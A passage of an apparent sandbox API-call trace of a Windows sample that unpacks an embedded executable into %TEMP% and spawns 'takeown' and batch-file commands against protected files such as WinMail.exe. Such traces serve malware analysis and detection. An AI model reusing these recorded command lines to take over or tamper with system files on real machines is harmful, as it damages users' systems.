lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0239.798] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x83À\x9e'äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0239.799] GetLastError () returned 0x0 [0239.799] SetLastError (dwErrCode=0x0) [0239.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.799] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0239.799] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0239.799] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0239.799] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x83À\x9e'äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0239.799] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2c9228 [0239.799] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0239.799] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0239.799] RtlSizeHeap (HeapHandle=0x2b0000, Flags=0x0, MemoryPointer=0x2c9228) returned 0x80 [0239.800] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0239.800] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0239.800] GetCurrentProcess () returned 0xffffffff [0239.800] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0239.800] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0239.800] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0239.800] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0239.800] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0239.800] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0239.800] LockResource (hResData=0x43c648) returned 0x43c648 [0239.800] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2c96f8 [0239.801] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.312] GetLastError () returned 0x20 [0240.312] GetLastError () returned 0x20 [0240.312] SetLastError (dwErrCode=0x20) [0240.312] GetLastError () returned 0x20 [0240.312] SetLastError (dwErrCode=0x20) [0240.312] GetLastError () returned 0x20 [0240.312] SetLastError (dwErrCode=0x20) [0240.312] GetLastError () returned 0x20 [0240.312] SetLastError (dwErrCode=0x20) [0240.312] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1000) returned 0x2c9718 [0240.313] GetLastError () returned 0x20 [0240.313] SetLastError (dwErrCode=0x20) [0240.313] GetLastError () returned 0x20 [0240.313] SetLastError (dwErrCode=0x20) [0240.313] GetLastError () returned 0x20 [0240.313] SetLastError (dwErrCode=0x20) [0240.313] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0240.313] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0240.316] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c87f8 | out: hHeap=0x2b0000) returned 1 [0240.317] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0240.317] ExitProcess (uExitCode=0x1) [0240.317] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c70a0 | out: hHeap=0x2b0000) returned 1 Process: id = "259" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x27f2c000" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "234" os_parent_pid = "0x7c4" cmd_line = "takeown /F \"C:\\Program Files\\Windows Mail\\WinMail.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 871 os_tid = 0x3c4 Thread: id = 877 os_tid = 0xb08 Process: id = "260" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x29abe000" os_pid = "0x1c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 872 os_tid = 0xb54 [0243.510] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3dfb8c | out: lpSystemTimeAsFileTime=0x3dfb8c*(dwLowDateTime=0x46ea5b00, dwHighDateTime=0x1d68287)) [0243.510] GetCurrentProcessId () returned 0x1c4 [0243.510] GetCurrentThreadId () returned 0xb54 [0243.510] GetTickCount () returned 0x1167a8d [0243.510] QueryPerformanceCounter (in: lpPerformanceCount=0x3dfb84 | out: lpPerformanceCount=0x3dfb84*=36384894421) returned 1 [0243.511] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0243.511] __set_app_type (_Type=0x1) [0243.511] __p__fmode () returned 0x770331f4 [0243.511] __p__commode () returned 0x770331fc [0243.511] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0243.511] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0243.512] GetCurrentThreadId () returned 0xb54 [0243.512] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb54) returned 0x60 [0243.512] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0243.512] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0243.512] SetThreadUILanguage (LangId=0x0) returned 0x409 [0243.512] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0243.512] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3dfb1c | out: phkResult=0x3dfb1c*=0x0) returned 0x2 [0243.513] VirtualQuery (in: lpAddress=0x3dfb53, lpBuffer=0x3dfaec, dwLength=0x1c | out: lpBuffer=0x3dfaec*(BaseAddress=0x3df000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0243.513] VirtualQuery (in: lpAddress=0x2e0000, lpBuffer=0x3dfaec, dwLength=0x1c | out: lpBuffer=0x3dfaec*(BaseAddress=0x2e0000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0243.513] VirtualQuery (in: lpAddress=0x2e1000, lpBuffer=0x3dfaec, dwLength=0x1c | out: lpBuffer=0x3dfaec*(BaseAddress=0x2e1000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0243.513] VirtualQuery (in: lpAddress=0x2e3000, lpBuffer=0x3dfaec, dwLength=0x1c | out: lpBuffer=0x3dfaec*(BaseAddress=0x2e3000, AllocationBase=0x2e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0243.513] VirtualQuery (in: lpAddress=0x3e0000, lpBuffer=0x3dfaec, dwLength=0x1c | out: lpBuffer=0x3dfaec*(BaseAddress=0x3e0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x170000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0243.513] GetConsoleOutputCP () returned 0x1b5 [0243.513] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0243.513] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0243.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.513] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0243.514] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.514] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0243.514] _get_osfhandle (_FileHandle=1) returned 0x7 [0243.514] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0243.515] _get_osfhandle (_FileHandle=0) returned 0x3 [0243.515] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0243.515] _get_osfhandle (_FileHandle=0) returned 0x3 [0243.515] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0243.516] GetEnvironmentStringsW () returned 0x754070* [0243.516] GetProcessHeap () returned 0x740000 [0243.516] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xaca) returned 0x754b48 [0243.516] FreeEnvironmentStringsW (penv=0x754070) returned 1 [0243.516] GetProcessHeap () returned 0x740000 [0243.516] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x4) returned 0x750d28 [0243.516] GetEnvironmentStringsW () returned 0x754070* [0243.517] GetProcessHeap () returned 0x740000 [0243.517] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xaca) returned 0x755620 [0243.517] FreeEnvironmentStringsW (penv=0x754070) returned 1 [0243.517] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3dea8c | out: phkResult=0x3dea8c*=0x68) returned 0x0 [0243.517] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x0, lpData=0x3dea98*=0x0, lpcbData=0x3dea90*=0x1000) returned 0x2 [0243.517] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x4, lpData=0x3dea98*=0x1, lpcbData=0x3dea90*=0x4) returned 0x0 [0243.517] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x0, lpData=0x3dea98*=0x1, lpcbData=0x3dea90*=0x1000) returned 0x2 [0243.517] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x4, lpData=0x3dea98*=0x0, lpcbData=0x3dea90*=0x4) returned 0x0 [0243.517] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x4, lpData=0x3dea98*=0x40, lpcbData=0x3dea90*=0x4) returned 0x0 [0243.517] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x4, lpData=0x3dea98*=0x40, lpcbData=0x3dea90*=0x4) returned 0x0 [0243.517] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x0, lpData=0x3dea98*=0x40, lpcbData=0x3dea90*=0x1000) returned 0x2 [0243.518] RegCloseKey (hKey=0x68) returned 0x0 [0243.518] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3dea8c | out: phkResult=0x3dea8c*=0x68) returned 0x0 [0243.518] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x0, lpData=0x3dea98*=0x40, lpcbData=0x3dea90*=0x1000) returned 0x2 [0243.518] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x4, lpData=0x3dea98*=0x1, lpcbData=0x3dea90*=0x4) returned 0x0 [0243.518] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x0, lpData=0x3dea98*=0x1, lpcbData=0x3dea90*=0x1000) returned 0x2 [0243.518] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x4, lpData=0x3dea98*=0x0, lpcbData=0x3dea90*=0x4) returned 0x0 [0243.518] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x4, lpData=0x3dea98*=0x9, lpcbData=0x3dea90*=0x4) returned 0x0 [0243.518] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x4, lpData=0x3dea98*=0x9, lpcbData=0x3dea90*=0x4) returned 0x0 [0243.518] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3dea94, lpData=0x3dea98, lpcbData=0x3dea90*=0x1000 | out: lpType=0x3dea94*=0x0, lpData=0x3dea98*=0x9, lpcbData=0x3dea90*=0x1000) returned 0x2 [0243.518] RegCloseKey (hKey=0x68) returned 0x0 [0243.518] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e309 [0243.518] srand (_Seed=0x5f51e309) [0243.518] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"\"" [0243.518] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"\"" [0243.519] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0243.519] GetProcessHeap () returned 0x740000 [0243.519] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x210) returned 0x754070 [0243.519] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x754078, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0243.520] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0243.520] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0243.520] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0243.520] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0243.520] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0243.520] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0243.520] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0243.520] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0243.520] _wcsicmp (_String1="PROMPT", 